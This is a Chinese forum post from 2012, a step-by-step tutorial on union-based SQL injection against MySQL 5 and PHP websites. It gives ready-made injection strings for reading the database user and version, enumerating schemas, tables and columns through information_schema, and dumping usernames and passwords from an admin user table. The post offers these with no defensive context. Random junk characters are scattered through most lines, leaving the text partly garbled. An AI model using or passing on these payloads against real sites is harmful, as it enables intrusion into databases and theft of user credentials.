/ D2 Z" U: e- o8 o. }, Z4 z
教程内容:Mysql 5+php 注入& Z- M# D* O# |: A: W& k
. h2 s9 _2 c, k( D0 Z% m, Z3 s( g; o1 O+ w
$ L Q3 j( [3 n一.查看MYSQL基本信息(库名,版本,用户)
S* W6 q+ M" P3 o! f2 G) b4 P$ z4 a8 F: r
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
, @) D# @; r5 j- p# j! G
. ~, s% H* Y% d" M二.查数据库3 M0 v3 C4 a8 x( C) N4 [5 O
7 T6 V- m+ c! j5 |
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
& ~: A# }' X' C7 @- u) blimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
9 H: P4 G; P/ t* J, G) R* c0 F( D. S5 B! f9 W0 w% o
三.暴表- O2 K/ V) ~4 o4 I8 h
/ u: S" J$ l1 Y S# |& Q- l% q0 x4 a( b
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
" g# P& K* Z8 Z$ @0 w, S, [, f/ w6 ~
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。5 `7 M: @1 O. \( @2 X! B
5 \* n0 x' W6 @: c% ^# X四.暴字段& L, x) p2 c/ I# Z$ N2 E
# m% l' p* S# O, j8 _, Jand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
) g+ s& Y3 m. X* b5 }2 s$ N) P: h$ A7 G& \
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。' K' x5 A3 [" j2 M5 F1 g
. z% l; Z! o2 Z/ k2 ^五.暴数据
! @) f- p* o' P
! v* K n" o$ k; J- r n5 y! Nand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
8 u# y) j1 u j3 X) Y1 ~
( u" a& m7 w. F2 O
3 {/ {! O9 v" |: g这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
4 d- f& b5 y3 w6 ` |
发表于 2012-9-13 16:27:53
收藏
支持
反对